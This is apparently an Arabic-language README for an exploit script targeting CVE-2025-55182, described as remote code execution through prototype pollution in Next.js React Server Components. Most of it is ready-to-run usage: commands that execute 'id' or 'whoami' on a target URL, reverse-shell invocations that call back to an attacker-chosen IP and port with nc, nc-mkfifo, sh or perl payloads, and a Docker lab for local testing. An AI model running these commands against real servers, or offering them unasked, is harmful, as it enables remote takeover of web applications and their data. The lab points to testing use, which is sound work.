
استغلال لـ CVE-2025-55182 يتيح تنفيذ التعليمات البرمجية عن بُعد عبر تلوث النموذج الأولي في React Server Components في Next.js، مع إمكانية تنفيذ الأوامر وإنشاء قشرة عكسية.
يستغل الثغرة CVE-2025-55182 لتنفيذ التعليمات البرمجية عن بُعد عبر تلوّث النموذج الأولي.
uv sync
source .venv/bin/activate
python3 exploit.py -u https://example.com -c "id"
python3 exploit.py -u https://example.com -r -l YOUR_IP -p 4444 -P nc-mkfifo
-u, --url: URL/المضيف المراد فحصه (مطلوب)-c, --cmd: الأمر المراد تنفيذه-r, --reverse: تفعيل وضع القشرة العكسية-l, --lhost: مضيف المستمع للقشرة العكسية-p, --lport: منفذ المستمع للقشرة العكسية-P, --payload: نوع حمولة القشرة العكسية: nc، nc-mkfifo، sh، perl (الافتراضي: nc)--timeout: مهلة الطلب بالثواني (الافتراضي: 10)# Execute command
python3 exploit.py -u https://example.com -c "whoami"
# Reverse shell with nc-mkfifo (recommended for Alpine)
python3 exploit.py -u https://example.com -r -l 172.29.0.1 -p 4444 -P nc-mkfifo
يحتوي دليل lab/ على إعداد Docker كامل لاختبار الاستغلال.
cd lab
docker-compose up -d
سيؤدي هذا إلى تشغيل خدمتين:
# Test on vulnerable instance
python3 exploit.py -u http://localhost:3011 -c "id"
# Test reverse shell (get gateway IP first)
GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')
python3 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo